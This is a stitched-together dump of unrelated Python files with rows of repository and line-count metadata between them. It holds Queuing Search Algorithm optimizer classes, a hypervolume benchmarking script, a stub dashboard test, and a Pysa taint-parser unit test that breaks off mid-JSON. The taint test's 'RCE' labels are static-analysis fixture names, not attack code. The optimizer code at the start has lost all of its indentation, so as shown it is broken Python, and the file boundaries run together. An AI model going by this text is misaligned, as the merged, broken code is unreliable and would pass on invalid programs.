F2 = beta * alpha * (E * abs(A - pop[i][self.ID_POS]))
if case == 1:
X_new = A + F1
new_fit = self.get_fitness_position(X_new)
if new_fit < pop[i][self.ID_FIT]:
pop[i] = [X_new, new_fit]
case = 1
else:
case = 2
else:
X_new = pop[i][self.ID_POS] + F2
new_fit = self.get_fitness_position(X_new)
if new_fit < pop[i][self.ID_FIT]:
pop[i] = [X_new, new_fit]
case = 2
else:
case = 1
return sorted(pop, key=lambda item: item[self.ID_FIT])
def _update_business_2__(self, pop=None):
A1, A2, A3 = pop[0][self.ID_POS], pop[1][self.ID_POS], pop[2][self.ID_POS]
t1, t2, t3 = pop[0][self.ID_FIT], pop[1][self.ID_FIT], pop[2][self.ID_FIT]
q1, q2, q3 = self._calculate_queue_length__(t1, t2, t3)
pr = [i / self.pop_size for i in range(1, self.pop_size + 1)]
if t1 > 1.0e-005:
cv = t1 / (t2 + t3)
else:
cv = 1.0 / 2
for i in range(self.pop_size):
if i < q1:
A = deepcopy(A1)
elif q1 <= i < q1 + q2:
A = deepcopy(A2)
else:
A = deepcopy(A3)
if random() < pr[i]:
i1, i2 = choice(self.pop_size, 2, replace=False)
if random() < cv:
X_new = pop[i][self.ID_POS] + exponential(0.5) * (pop[i1][self.ID_POS] - pop[i2][self.ID_POS])
else:
X_new = pop[i][self.ID_POS] + exponential(0.5) * (A - pop[i1][self.ID_POS])
fit = self.get_fitness_position(X_new)
if fit < pop[i][self.ID_FIT]:
pop[i] = [X_new, fit]
return sorted(pop, key=lambda item: item[self.ID_FIT])
def _update_business_3__(self, pop, g_best):
pr = array([i / self.pop_size for i in range(1, self.pop_size + 1)])
for i in range(self.pop_size):
X_new = deepcopy(pop[i][self.ID_POS])
id1= choice(self.pop_size)
temp = g_best[self.ID_POS] + exponential(0.5, self.problem_size) * (pop[id1][self.ID_POS] - pop[i][self.ID_POS])
X_new = where(random(self.problem_size) > pr[i], temp, X_new)
fit = self.get_fitness_position(X_new)
if fit < pop[i][self.ID_FIT]:
pop[i] = [X_new, fit]
return pop
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
pop, g_best = self.get_sorted_pop_and_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
pop = self._update_business_1__(pop, epoch+1)
pop = self._update_business_2__(pop)
pop = self._update_business_3__(pop, g_best)
pop, g_best = self.update_sorted_population_and_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class OppoQSA(BaseQSA):
def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100):
BaseQSA.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose, epoch, pop_size)
def _opposition_based__(self, pop=None, g_best=None):
pop = sorted(pop, key=lambda item: item[self.ID_FIT])
for i in range(0, self.pop_size):
X_new = self.create_opposition_position(pop[i][self.ID_POS], g_best[self.ID_POS])
fitness = self.get_fitness_position(X_new)
if fitness < pop[i][self.ID_FIT]:
pop[i] = [X_new, fitness]
return pop
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
pop, g_best = self.get_sorted_pop_and_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
pop = self._update_business_1__(pop, epoch)
pop = self._update_business_2__(pop)
pop = self._update_business_3__(pop, g_best)
pop = self._opposition_based__(pop, g_best)
pop, g_best = self.update_sorted_population_and_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class LevyQSA(BaseQSA):
def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100):
BaseQSA.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose, epoch, pop_size)
def _update_business_2__(self, pop=None, current_epoch=None):
A1, A2, A3 = pop[0][self.ID_POS], pop[1][self.ID_POS], pop[2][self.ID_POS]
t1, t2, t3 = pop[0][self.ID_FIT], pop[1][self.ID_FIT], pop[2][self.ID_FIT]
q1, q2, q3 = self._calculate_queue_length__(t1, t2, t3)
pr = [i / self.pop_size for i in range(1, self.pop_size + 1)]
if t1 > 1.0e-6:
cv = t1 / (t2 + t3)
else:
cv = 1 / 2
for i in range(self.pop_size):
if i < q1:
A = deepcopy(A1)
elif q1 <= i < q1 + q2:
A = deepcopy(A2)
else:
A = deepcopy(A3)
if random() < pr[i]:
id1= choice(self.pop_size)
if random() < cv:
X_new = self.levy_flight(current_epoch, pop[i][self.ID_POS], A)
else:
X_new = pop[i][self.ID_POS] + exponential(0.5) * (A - pop[id1][self.ID_POS])
fit = self.get_fitness_position(X_new)
if fit < pop[i][self.ID_FIT]:
pop[i] = [X_new, fit]
return sorted(pop, key=lambda item: item[self.ID_FIT])
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
pop, g_best = self.get_sorted_pop_and_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
pop = self._update_business_1__(pop, epoch+1)
pop = self._update_business_2__(pop, epoch+1)
pop = self._update_business_3__(pop, g_best)
pop, g_best = self.update_sorted_population_and_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch+1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class ImprovedQSA(OppoQSA, LevyQSA):
def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100):
OppoQSA.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose, epoch, pop_size)
LevyQSA.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose, epoch, pop_size)
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
pop, g_best = self.get_sorted_pop_and_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
pop = self._update_business_1__(pop, epoch+1)
pop = self._update_business_2__(pop, epoch+1)
pop = self._update_business_3__(pop, g_best)
pop = self._opposition_based__(pop, g_best)
pop, g_best = self.update_sorted_population_and_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class OriginalQSA(BaseQSA):
"""
The original version of: Queuing search algorithm (QSA)
(Queuing search algorithm: A novel metaheuristic algorithm for solving engineering optimization problems)
Link:
"""
def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100):
BaseQSA.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose, epoch, pop_size)
def _update_business_3__(self, pop, g_best):
pr = [i / self.pop_size for i in range(1, self.pop_size + 1)]
for i in range(self.pop_size):
X_new = deepcopy(pop[i][self.ID_POS])
for j in range(self.problem_size):
if random() > pr[i]:
i1, i2 = choice(self.pop_size, 2, replace=False)
e = exponential(0.5)
X1 = pop[i1][self.ID_POS]
X2 = pop[i2][self.ID_POS]
X_new[j] = X1[j] + e * (X2[j] - pop[i][self.ID_POS][j])
fit = self.get_fitness_position(position=X_new, minmax=self.ID_MIN_PROB)
if fit < pop[i][self.ID_FIT]:
pop[i] = [X_new, fit]
return pop
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
pop, g_best = self.get_sorted_pop_and_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
pop = self._update_business_1__(pop, epoch)
pop = self._update_business_2__(pop)
pop = self._update_business_3__(pop, g_best)
pop, g_best = self.update_sorted_population_and_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
| 47.066667
| 127
| 0.553675
| 1,915
| 13,414
| 3.597911
| 0.090862
| 0.075762
| 0.05225
| 0.035123
| 0.835704
| 0.79971
| 0.785631
| 0.773004
| 0.766763
| 0.754136
| 0
| 0.03542
| 0.311764
| 13,414
| 284
| 128
| 47.232394
| 0.710897
| 0.095572
| 0
| 0.725664
| 0
| 0
| 0.009995
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075221
| false
| 0
| 0.017699
| 0
| 0.168142
| 0.022124
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
786270be520d714e95a833a9719b491def9ebb3c
| 6,918
|
py
|
Python
|
help scripts/experimentsMOGA.py
|
napa-jmm/CEGO
|
172d511133a608ca5bf265d9ebd2937b8a171b3e
|
[
"MIT"
] | 6
|
2018-07-18T06:38:42.000Z
|
2021-11-17T21:01:40.000Z
|
help scripts/experimentsMOGA.py
|
napa-jmm/CEGO
|
172d511133a608ca5bf265d9ebd2937b8a171b3e
|
[
"MIT"
] | null | null | null |
help scripts/experimentsMOGA.py
|
napa-jmm/CEGO
|
172d511133a608ca5bf265d9ebd2937b8a171b3e
|
[
"MIT"
] | 6
|
2018-10-15T09:35:24.000Z
|
2021-05-08T13:40:19.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 20 09:00:23 2018
@author: r.dewinter
"""
import numpy as np
import matplotlib.pyplot as plt
from hypervolume import hypervolume
from paretofrontFeasible import paretofrontFeasible
import os
#plt.plot(objectivesMOGA[:,0],objectivesMOGA[:,1],'ro',c='r')
#plt.plot(objectivesSPEA2[:,0],objectivesSPEA2[:,1],'ro',c='b')
#plt.plot(objectivesNSGAII[:,0],objectivesNSGAII[:,1],'ro',c='g')
#plt.plot(objectivesCEGO[:,0],objectivesCEGO[:,1],'ro',c='m')
hyp = []
fname = 'optimize ship'
ref = np.array([5000,2])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,9:-3]
constraints[:,:4] = constraints[:,:4]*-1+1
constraints[:,4:] = constraints[:,4:]*-1
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'SRD'
ref = np.array([7000,1700])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,10:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'TBTD'
ref = np.array([0.1,100000])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,6:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'WB'
ref = np.array([350,0.1])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,7:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'DBD'
ref = np.array([5,50])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,7:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'SPD'
ref = np.array([16,19000,-260000])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,9:-4]
objectives = data[1:,-4:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'WP'
ref = np.array([83000, 1350, 2.85, 15989825, 25000])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,6:13]
objectives = data[1:,13:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
############################ artificial
hyp = []
fname = 'BNH'
ref = np.array([140,50])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,-5:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'CEXP'
ref = np.array([1,9])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,-5:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'C3DTLZ4'
ref = np.array([3,3])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,-5:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'SRN'
ref = np.array([301,72])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,-5:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'TNK'
ref = np.array([3,3])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,-5:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'OSY'
ref = np.array([0,386])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = -1*data[1:,-9:-3] #>0
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'CTP1'
ref = np.array([1,2])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = -1*data[1:,-5:-3] #>0
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'CSI'
ref = np.array([42,4.5,13])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,-14:-4]
objectives = data[1:,-4:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
| 30.746667
| 69
| 0.631685
| 1,011
| 6,918
| 4.322453
| 0.104847
| 0.102975
| 0.12357
| 0.102975
| 0.844622
| 0.833181
| 0.833181
| 0.833181
| 0.833181
| 0.833181
| 0
| 0.046524
| 0.157994
| 6,918
| 225
| 70
| 30.746667
| 0.703691
| 0.049147
| 0
| 0.764706
| 0
| 0
| 0.014256
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.026738
| 0
| 0.026738
| 0.240642
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
787305328e7c39c07f84c3f6b91187470a94df1b
| 187
|
py
|
Python
|
gammaboard/tests/test_gammaboard.py
|
gammaboard/gammaboard
|
9a3bd289b4e8f0c933a08b225febb45966fcddd3
|
[
"MIT"
] | null | null | null |
gammaboard/tests/test_gammaboard.py
|
gammaboard/gammaboard
|
9a3bd289b4e8f0c933a08b225febb45966fcddd3
|
[
"MIT"
] | 13
|
2018-12-12T14:15:36.000Z
|
2019-08-27T15:18:14.000Z
|
gammaboard/tests/test_gammaboard.py
|
gammaboard/gammaboard
|
9a3bd289b4e8f0c933a08b225febb45966fcddd3
|
[
"MIT"
] | 1
|
2019-04-15T12:50:49.000Z
|
2019-04-15T12:50:49.000Z
|
from gammaboard import *
def test_open_dashboard():
"""
TODO: test and close notebook automatically
"""
# process = open_dashboard()
# process.terminate()
pass
| 15.583333
| 47
| 0.641711
| 19
| 187
| 6.157895
| 0.789474
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.256684
| 187
| 11
| 48
| 17
| 0.841727
| 0.486631
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
7890f1b31bc412acaade19e74b82f7e962b2c917
| 172,776
|
py
|
Python
|
sapp/pipeline/tests/test_pysa_taint_parser.py
|
facebook/sapp
|
4b85d10a791d8e9c8ae83d1f62fbded24845f053
|
[
"MIT"
] | 74
|
2020-12-18T20:04:30.000Z
|
2022-03-22T22:26:02.000Z
|
sapp/pipeline/tests/test_pysa_taint_parser.py
|
facebook/sapp
|
4b85d10a791d8e9c8ae83d1f62fbded24845f053
|
[
"MIT"
] | 61
|
2020-12-21T21:33:05.000Z
|
2022-01-27T21:22:20.000Z
|
sapp/pipeline/tests/test_pysa_taint_parser.py
|
facebook/sapp
|
4b85d10a791d8e9c8ae83d1f62fbded24845f053
|
[
"MIT"
] | 20
|
2021-04-08T01:28:53.000Z
|
2022-03-22T22:26:05.000Z
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import io
import unittest
from typing import Iterable, Union
from ...analysis_output import AnalysisOutput, Metadata
from .. import (
ParseConditionTuple,
ParseIssueConditionTuple,
ParseIssueTuple,
SourceLocation,
ParseTraceFeature,
)
from ..base_parser import ParseType
from ..pysa_taint_parser import Parser
class TestParser(unittest.TestCase):
def assertParsed(
self,
version: int,
input: str,
expected: Iterable[Union[ParseConditionTuple, ParseIssueTuple]],
) -> None:
input = "".join(input.split("\n")) # Flatten json-line.
input = '{"file_version":%d}\n%s' % (version, input) # Add version header.
parser = Parser()
analysis_output = AnalysisOutput(
directory="/output/directory",
filename_specs=["taint-output.json"],
file_handle=io.StringIO(input),
metadata=Metadata(
analysis_root="/analysis/root",
rules={1: {"name": "TestRule", "description": "Test Rule Description"}},
),
)
def sort_entry(e: Union[ParseConditionTuple, ParseIssueTuple]) -> str:
if isinstance(e, ParseConditionTuple):
return e.caller
else:
return e.callable
self.assertEqual(
sorted(parser.parse(analysis_output), key=sort_entry),
expected,
)
def testEmptyModelV2(self) -> None:
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {}
}
""",
expected=[],
)
def testEmptyModelV3(self) -> None:
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {}
}
""",
expected=[],
)
def testIssueV2(self) -> None:
# Indirect source to indirect sink.
self.assertParsed(
version=2,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 14,
"start": 15,
"end": 16
},
"resolves_to": [
"foo.source"
],
"port": "result",
"length": 1
},
"tito": [ { "line": 17, "start": 18, "end": 19 } ],
"leaves": [
{
"kind": "UserControlled",
"name": "_user_controlled"
}
],
"features": [ { "always-via": "source-feature" } ]
}
]
},
{
"name": "backward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 20,
"start": 21,
"end": 22
},
"resolves_to": [
"foo.sink"
],
"port": "formal(x)[parameter]",
"length": 2
},
"tito": [ { "line": 23, "start": 24, "end": 25 } ],
"leaves": [
{
"kind": "RCE",
"name": "_remote_code_execution"
}
],
"features": [ { "always-via": "sink-feature" } ]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="foo.source",
port="result",
location=SourceLocation(
line_no=14,
begin_column=16,
end_column=16,
),
leaves=[("UserControlled", 1)],
titos=[
SourceLocation(
line_no=17, begin_column=19, end_column=19
),
],
features=[],
type_interval=None,
annotations=[],
)
],
preconditions=[
ParseIssueConditionTuple(
callee="foo.sink",
port="formal(x)[parameter]",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("RCE", 2)],
titos=[
SourceLocation(
line_no=23, begin_column=25, end_column=25
)
],
features=[],
type_interval=None,
annotations=[],
)
],
initial_sources={("_user_controlled", "UserControlled", 1)},
final_sinks={("_remote_code_execution", "RCE", 2)},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# Direct source + indirect source to direct sink + indirect sink.
self.assertParsed(
version=2,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"tito": [
{ "line": 110, "start": 111, "end": 112 },
{ "line": 113, "start": 114, "end": 115 }
],
"leaves": [
{
"kind": "UserControlled",
"name": "_user_controlled"
}
],
"features": [ { "via": "source-direct" } ]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 120,
"start": 121,
"end": 122
},
"resolves_to": [
"foo.source"
],
"port": "result",
"length": 2
},
"leaves": [
{
"kind": "UserControlled",
"name": "_other_user_controlled"
}
],
"features": [ { "always-via": "source-indirect" } ]
}
]
},
{
"name": "backward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 200,
"start": 201,
"end": 202
},
"tito": [ { "line": 210, "start": 211, "end": 212 } ],
"leaves": [
{
"kind": "RCE",
"name": "_other_remote_code_execution"
}
],
"features": [ { "always-via": "sink-direct" } ]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 220,
"start": 221,
"end": 222
},
"resolves_to": [
"foo.sink"
],
"port": "formal(y)",
"length": 5
},
"leaves": [
{
"kind": "RCE",
"name": "_remote_code_execution"
}
],
"features": [ { "via": "sink-indirect" } ]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="_user_controlled",
port="source",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=110, begin_column=112, end_column=112
),
SourceLocation(
line_no=113, begin_column=115, end_column=115
),
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.source",
port="result",
location=SourceLocation(
line_no=120,
begin_column=122,
end_column=122,
),
leaves=[("UserControlled", 2)],
titos=[],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="_other_remote_code_execution",
port="sink",
location=SourceLocation(
line_no=200,
begin_column=202,
end_column=202,
),
leaves=[("RCE", 0)],
titos=[
SourceLocation(
line_no=210, begin_column=212, end_column=212
)
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.sink",
port="formal(y)",
location=SourceLocation(
line_no=220,
begin_column=222,
end_column=222,
),
leaves=[("RCE", 5)],
titos=[],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={
("_user_controlled", "UserControlled", 0),
("_other_user_controlled", "UserControlled", 2),
},
final_sinks={
("_other_remote_code_execution", "RCE", 0),
("_remote_code_execution", "RCE", 5),
},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# direct source with multiple leaves to direct sinks with multiple leaves.
self.assertParsed(
version=2,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"tito": [ { "line": 110, "start": 111, "end": 112 } ],
"leaves": [
{
"kind": "UserControlled",
"name": "_user_controlled"
},
{
"kind": "UserControlled",
"name": "_other_user_controlled"
}
],
"features": [ { "via": "source-direct" } ]
}
]
},
{
"name": "backward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 200,
"start": 201,
"end": 202
},
"tito": [ { "line": 210, "start": 211, "end": 212 } ],
"leaves": [
{
"kind": "RCE",
"name": "_remote_code_execution"
},
{
"kind": "RCE",
"name": "_other_remote_code_execution"
}
],
"features": [ { "always-via": "sink-direct" } ]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="_user_controlled",
port="source",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=110, begin_column=112, end_column=112
),
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="_other_user_controlled",
port="source",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=110, begin_column=112, end_column=112
),
],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="_remote_code_execution",
port="sink",
location=SourceLocation(
line_no=200,
begin_column=202,
end_column=202,
),
leaves=[("RCE", 0)],
titos=[
SourceLocation(
line_no=210, begin_column=212, end_column=212
)
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="_other_remote_code_execution",
port="sink",
location=SourceLocation(
line_no=200,
begin_column=202,
end_column=202,
),
leaves=[("RCE", 0)],
titos=[
SourceLocation(
line_no=210, begin_column=212, end_column=212
)
],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={
("_user_controlled", "UserControlled", 0),
("_other_user_controlled", "UserControlled", 0),
},
final_sinks={
("_other_remote_code_execution", "RCE", 0),
("_remote_code_execution", "RCE", 0),
},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# Indirect source with multiple callees to indirect sinks with multiple callees.
self.assertParsed(
version=2,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 14,
"start": 15,
"end": 16
},
"resolves_to": [
"foo.source",
"foo.other_source"
],
"port": "result",
"length": 1
},
